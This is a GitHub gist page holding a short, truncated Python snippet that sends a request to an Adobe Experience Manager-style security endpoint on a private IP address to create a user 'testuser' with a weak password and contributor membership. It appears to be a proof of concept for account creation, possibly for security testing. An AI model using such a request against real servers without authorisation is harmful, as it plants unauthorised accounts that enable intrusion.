Skip to content

Instantly share code, notes, and snippets.

View sherlock1453's full-sized avatar

Utkrisht Sharma sherlock1453

  • Delhi,India
View GitHub Profile
import requests
url = "http://192.168.100.231:4502/libs/granite/security/post/authorizables"
payload={'createUser': 'testuser',
'authorizableId': 'testuser',
'rep:password': 'abc123',
'membership': 'contributor'}
files=[